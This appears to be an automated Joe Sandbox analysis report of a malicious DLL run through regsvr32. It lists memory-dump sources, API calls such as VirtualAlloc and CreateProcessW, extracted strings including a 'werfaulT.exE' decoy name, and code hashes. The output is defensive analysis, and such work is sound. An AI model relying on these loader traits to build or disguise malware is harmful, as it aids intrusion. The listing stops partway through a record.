                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad$AllocVirtualatoi
                                                                                                                      • String ID: 0kernel32.dll$DllRegisterServer$Killer$VirtualAlloc$werfaulT.exE$yRcVE?B4mF1Ub^B?CTYTwZ62pm%*#*6AK)Lcw#t$$!ar6W0IsP+plZj4L
                                                                                                                      • API String ID: 2552574867-577226
                                                                                                                      • Opcode ID: 7e4cd086db316eb567412c41cbd9cb6871e241be05acf9e0ba56d7faec89a8d0
                                                                                                                      • Instruction ID: 9fe45162f6f5a7e0ead5f169d259151cfe96a64d2d6c3dbcc00486480c448d40
                                                                                                                      • Opcode Fuzzy Hash: 7e4cd086db316eb567412c41cbd9cb6871e241be05acf9e0ba56d7faec89a8d0
                                                                                                                      • Instruction Fuzzy Hash: 54710672B02A448AEB55CF55F8007A93BB2F74D7AEF4CC1259E0A43760EB79C596C701
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 404 180006354-18000642f call 18000488c 407 180006435-1800064e7 call 1800195d0 404->407 408 1800064ed-180006537 CreateProcessW 404->408 407->408
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: f,
                                                                                                                      • API String ID: 963392458-4093033866
                                                                                                                      • Opcode ID: d78b71fd3b952264d2aae548a623963ef7f2e37c8d1b586cc601e8f5e47a7244
                                                                                                                      • Instruction ID: bece6d9ef495c36f3a5d89a96746cf52e1dbe081a693fdd2c437ac4eca7ce3cc
                                                                                                                      • Opcode Fuzzy Hash: d78b71fd3b952264d2aae548a623963ef7f2e37c8d1b586cc601e8f5e47a7244
                                                                                                                      • Instruction Fuzzy Hash: 0451057091C7848FDBB8DF58D08579ABBE0FB88314F20495EE48DC7255DB749984CB86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RtlCaptureContext.KERNEL32 ref: 61A020D4
                                                                                                                      • RtlLookupFunctionEntry.KERNEL32 ref: 61A020EB
                                                                                                                      • RtlVirtualUnwind.KERNEL32 ref: 61A0212D
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 61A02174
                                                                                                                      • UnhandledExceptionFilter.KERNEL32 ref: 61A02181
                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 61A02187
                                                                                                                      • TerminateProcess.KERNEL32 ref: 61A02195
                                                                                                                      • abort.MSVCRT ref: 61A0219B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278921479-0
                                                                                                                      • Opcode ID: 9baf29b56119cd197b7fdba20589df15a68996648cd5ae488002e939ebdfbad0
                                                                                                                      • Instruction ID: 2bb93638232a05f7df488745d6ee2db4947226ed272734b58cc2cf90136609d1
                                                                                                                      • Opcode Fuzzy Hash: 9baf29b56119cd197b7fdba20589df15a68996648cd5ae488002e939ebdfbad0
                                                                                                                      • Instruction Fuzzy Hash: D821D475A16F1089EB008FA1F8843C937A6BB0CB9AF480126D94D07774EF3AC5A4C305
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 54$4}$JUA$rl$rl$rl$|e]$q
                                                                                                                      • API String ID: 0-1550155180
                                                                                                                      • Opcode ID: db019eadf98ca12d9e99c6ee6005392c2ef14a6030e5a02c2edde3c1221fe249
                                                                                                                      • Instruction ID: b8492a94391f6304207636f1588bd642403f4ebffebf1dcae69d8bccc68d06f5
                                                                                                                      • Opcode Fuzzy Hash: db019eadf98ca12d9e99c6ee6005392c2ef14a6030e5a02c2edde3c1221fe249
                                                                                                                      • Instruction Fuzzy Hash: 452231706087448FC3A9DF28C58A65BBBF1FB96744F108A1DF68686260DB72D849CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: f@$+zt$;D}$?J$B&i$C$C$EgP
                                                                                                                      • API String ID: 0-2619606407
                                                                                                                      • Opcode ID: 24f02117c4ade72fbcb004c10bbaab5a6543e29b8f52d06bdc1530e0bedab057
                                                                                                                      • Instruction ID: 6e35fed615611edcfafcbc52908e48d80cac888fd7d12d59afb7716b30df215a
                                                                                                                      • Opcode Fuzzy Hash: 24f02117c4ade72fbcb004c10bbaab5a6543e29b8f52d06bdc1530e0bedab057
                                                                                                                      • Instruction Fuzzy Hash: 0712F2B1504788CBCB9CDF68C88A6DD7BF0FF48358F605219FA4297250D7B69989CB80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':C$*$*$>T$Nr$Pz9$~4u
                                                                                                                      • API String ID: 0-1762166304
                                                                                                                      • Opcode ID: 65e2131fd6e1afa00674089c9878fcf21afda126a660493734cb926be17950b6
                                                                                                                      • Instruction ID: 51bd79b2d58a69e495040b4220cffd87ac9540837042dba00b883a82072ef738
                                                                                                                      • Opcode Fuzzy Hash: 65e2131fd6e1afa00674089c9878fcf21afda126a660493734cb926be17950b6
                                                                                                                      • Instruction Fuzzy Hash: 1ED28E715443888BDBB9DF24D8CE7DD3BA1BB44344F20421AEC4AAE271DBB45B898B45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ?o$T?$Z-f$fUb$?9$5
                                                                                                                      • API String ID: 0-3056351011
                                                                                                                      • Opcode ID: 849d61b0f48dfc06e4cadb7c189e24b77e514712aab61ae8967f7e573f89fb3e
                                                                                                                      • Instruction ID: 0894a0bf7de6e06cc435ebc9f45ba10a59171af41b5288e9adb8c217d0634f24
                                                                                                                      • Opcode Fuzzy Hash: 849d61b0f48dfc06e4cadb7c189e24b77e514712aab61ae8967f7e573f89fb3e
                                                                                                                      • Instruction Fuzzy Hash: 3FA2DB71E0470C9FCB58CFA8E48AADEBBF2FB48344F00411DE946B6250D7B49919CB99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :t@$Cctv$G)$[L:$bGVv$;XX
                                                                                                                      • API String ID: 0-2651510874
                                                                                                                      • Opcode ID: ebefbefb228ea4221a23a3db34240f10d752f79d03699ae3247339b7e600d81d
                                                                                                                      • Instruction ID: 3fa13f87646e341335cf2d5da82a9ab907462438b0e8e4c36472bc32e17a151b
                                                                                                                      • Opcode Fuzzy Hash: ebefbefb228ea4221a23a3db34240f10d752f79d03699ae3247339b7e600d81d
                                                                                                                      • Instruction Fuzzy Hash: 9D820275A0670CCBCBA8DF68C18A69D7BF1FF54348F104129EC5A9B261D774D829CB88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #~|$&j$EA$a'$a'$]Y
                                                                                                                      • API String ID: 0-1695939866
                                                                                                                      • Opcode ID: 378c48654ee1750df59a6c890e7bacabbcca463348e7dfcb63075c49c87dc93a
                                                                                                                      • Instruction ID: e21423faf12df89bff477ce7a7495e34c55c19d60d0c56de6aa05514e7b9627f
                                                                                                                      • Opcode Fuzzy Hash: 378c48654ee1750df59a6c890e7bacabbcca463348e7dfcb63075c49c87dc93a
                                                                                                                      • Instruction Fuzzy Hash: 1F811C70A0878C8FDB99CFE4C08ABDEBBF2EB14348F40452DD506BA299D7749519CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32 ref: 61A02035
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 61A02040
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 61A02048
                                                                                                                      • GetTickCount.KERNEL32 ref: 61A02050
                                                                                                                      • QueryPerformanceCounter.KERNEL32 ref: 61A0205D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_61a00000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1445889803-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +^HA$GE($WnaS$x;u$^A
                                                                                                                      • API String ID: 0-1612960799
                                                                                                                      • Opcode ID: d1bb413db5342d13236a5252f506a007732f7f1951add3ff43b4ad9bf9783fe2
                                                                                                                      • Instruction ID: ade12ba945beac2eccb9b202867825156fa00f31183fc119c9a734923265b1be
                                                                                                                      • Opcode Fuzzy Hash: d1bb413db5342d13236a5252f506a007732f7f1951add3ff43b4ad9bf9783fe2
                                                                                                                      • Instruction Fuzzy Hash: 8582527054878B8FCB78CF54C845BEEBBE0FB84344F11852DE86A8BA51E7B49648DB41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ~!$)|?$Gg$znG$]
                                                                                                                      • API String ID: 0-3919302544
                                                                                                                      • Opcode ID: 32de2dcebff0374593804b0e7094616ad12da305c18c34de7d75ec55dcef621e
                                                                                                                      • Instruction ID: e13b212153971c9eb02a2710c78321ed4094e0214168ed3f9ff77940122585c0
                                                                                                                      • Opcode Fuzzy Hash: 32de2dcebff0374593804b0e7094616ad12da305c18c34de7d75ec55dcef621e
                                                                                                                      • Instruction Fuzzy Hash: 3172EE7190674CCBCBA9DF68C28A6DD7BF1FF54308F105129EC1A9A265D7B0D829CB48
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6j>$:A$b=$mK`D$n2
                                                                                                                      • API String ID: 0-1550447772
                                                                                                                      • Opcode ID: 7e135a6aa02c4598783c3e55258971c7cbf1e84fdd5cab4d3eb216824c841b9e
                                                                                                                      • Instruction ID: ac79d797fc740dac7979eade9f146a0292363409bd1ba7e938d22e099dda0476
                                                                                                                      • Opcode Fuzzy Hash: 7e135a6aa02c4598783c3e55258971c7cbf1e84fdd5cab4d3eb216824c841b9e
                                                                                                                      • Instruction Fuzzy Hash: C66207B1A0474C8FEB98DFA8D09A6DEBBF1FB48344F00412DE846B7290D7749909CB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: a$!k"o$#8]$MN*$^q6
                                                                                                                      • API String ID: 0-934311000
                                                                                                                      • Opcode ID: a342133185aaac21085345e8195a13c79c8f12aecb6690fc4d159e1ea76cce31
                                                                                                                      • Instruction ID: b8d04421a3d58ce288d2eca7a5a58c8ab2ec1db2a388840500dd813fbd0f3cfe
                                                                                                                      • Opcode Fuzzy Hash: a342133185aaac21085345e8195a13c79c8f12aecb6690fc4d159e1ea76cce31
                                                                                                                      • Instruction Fuzzy Hash: 27624970908B448FE769CF78C58665EBBF0FB88744F204A1DE6A297271DB709945CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Ou$Sp$[&pS$e$e
                                                                                                                      • API String ID: 0-3967473514
                                                                                                                      • Opcode ID: b838546b4176569e34a1945ecef43ebb85bac28b155539e5881bc11cd77cdeba
                                                                                                                      • Instruction ID: 101c9f2e5feab9a172dba2483d3f9976fa746e93e3a65aae9dd55b09961dec4c
                                                                                                                      • Opcode Fuzzy Hash: b838546b4176569e34a1945ecef43ebb85bac28b155539e5881bc11cd77cdeba
                                                                                                                      • Instruction Fuzzy Hash: A312E870509B88CFDBB8DF24CC95AEF7BA5FB44346F10551DE84A8A290DBB4A648CF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$Z!|$ss_$y{t$ )
                                                                                                                      • API String ID: 0-2722653118
                                                                                                                      • Opcode ID: 7d5efc16f42b0844ecf84fbc5ebd30f81cc6e41ff778f15f35d4ac702dcc55ef
                                                                                                                      • Instruction ID: f3f3aea8617a373b237cc758d1d2a23631adaaffa2f666179efd7d4515aad235
                                                                                                                      • Opcode Fuzzy Hash: 7d5efc16f42b0844ecf84fbc5ebd30f81cc6e41ff778f15f35d4ac702dcc55ef
                                                                                                                      • Instruction Fuzzy Hash: 6402D1B1508749EFCB98CF28C489ADE7BF0FB48308F40852AF84A9B654D774DA59CB45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *G~$2M$2M$@($71
                                                                                                                      • API String ID: 0-1260267515
                                                                                                                      • Opcode ID: ccf4e93f57bf365c828c5c8d8cf679fc6308ca5f235dcb1149029249039b82fe
                                                                                                                      • Instruction ID: a60b1c6429c9a0c710841cc410b4464ef82b670ed1cc530a53e0d0364d690f78
                                                                                                                      • Opcode Fuzzy Hash: ccf4e93f57bf365c828c5c8d8cf679fc6308ca5f235dcb1149029249039b82fe
                                                                                                                      • Instruction Fuzzy Hash: CAF1E771509B88CFDBF8CF24CC89AEB7BA5FB94306F50551DE8498A290DBB46649CF01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6a$6a$Y8 M$$F#$-u
                                                                                                                      • API String ID: 0-3446220227
                                                                                                                      • Opcode ID: 27fa9943bc3e8c62a616c10e757d55ae8a4ff86197b547f3d234640ac06f980c
                                                                                                                      • Instruction ID: 8126f88596b706ed83af55e318b343352c2800260c5d8743873699bdf7eb83a0
                                                                                                                      • Opcode Fuzzy Hash: 27fa9943bc3e8c62a616c10e757d55ae8a4ff86197b547f3d234640ac06f980c
                                                                                                                      • Instruction Fuzzy Hash: 1FC1037151478CEBDBACCF28C88AADD3BA0FF44394F906219FD4686250C7B5D989CB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: WC$Gb$O~0$R,$\
                                                                                                                      • API String ID: 0-2327676338
                                                                                                                      • Opcode ID: 3f53c34cf11dabf75b68b6c47b2a7973301720c657f8908331559394a0c880fd
                                                                                                                      • Instruction ID: 1e9c95f8d19532dcc68671874b0177c57bea3b0f40d2692ca8e7d50082c1aafa
                                                                                                                      • Opcode Fuzzy Hash: 3f53c34cf11dabf75b68b6c47b2a7973301720c657f8908331559394a0c880fd
                                                                                                                      • Instruction Fuzzy Hash: 6CB133B1914B188FCF88DFA8C88A9DDBBF0FB48314F509219E856A7250D774A945CF98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8Hs$6<i$I$I
                                                                                                                      • API String ID: 0-3660419428
                                                                                                                      • Opcode ID: bbbbdc346c34a74b47b101373357184c089de64881e60b2eafde507b83114393
                                                                                                                      • Instruction ID: 9623f6038e7675015212ef51f323290aed2c5a127f930c375a5912d27c0d129c
                                                                                                                      • Opcode Fuzzy Hash: bbbbdc346c34a74b47b101373357184c089de64881e60b2eafde507b83114393
                                                                                                                      • Instruction Fuzzy Hash: D9520571915B888FEBB8CF68CC993DD7BB2FB88314F104219D80A9B251DB725668CF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HgX$P9C$a` $h
                                                                                                                      • API String ID: 0-609081406
                                                                                                                      • Opcode ID: fe56b32a8a9353e5dc900e83e6528203d4322037eb3f1070b63b54f8927d8826
                                                                                                                      • Instruction ID: 634dadb30669fb719531d894f4a7fd1ee8f4afe550b8a29671aa4bb51bddbe8e
                                                                                                                      • Opcode Fuzzy Hash: fe56b32a8a9353e5dc900e83e6528203d4322037eb3f1070b63b54f8927d8826
                                                                                                                      • Instruction Fuzzy Hash: 75C1B1B1C0435C8FDB68CFA9D98958DBBF1FB58308F20461DE859AB262DB749949CF40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .;$qj$$tD]
                                                                                                                      • API String ID: 0-1976487847
                                                                                                                      • Opcode ID: 02e24ff6ad4a8ee7fcae493fe90cd0f4742901c5b91873881614e018be9d0f74
                                                                                                                      • Instruction ID: 946a21ede28f6f00005b47886019b3e0ccc2c5ed1fa4bc79e6c940f5ff57e383
                                                                                                                      • Opcode Fuzzy Hash: 02e24ff6ad4a8ee7fcae493fe90cd0f4742901c5b91873881614e018be9d0f74
                                                                                                                      • Instruction Fuzzy Hash: 1F5207B190478C8BDBB8CF64C8896DD7BF0FB48318F50852DEA199B251DBB45784CB98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A8K$[*$H7
                                                                                                                      • API String ID: 0-3429353871
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "$"$2jF
                                                                                                                      • API String ID: 0-109344544
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,6l$fK$pE"7
                                                                                                                      • API String ID: 0-371989378
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X&$mo8$O~
                                                                                                                      • API String ID: 0-2010489101
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &x|:$D@s$YNh
                                                                                                                      • API String ID: 0-2192453529
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
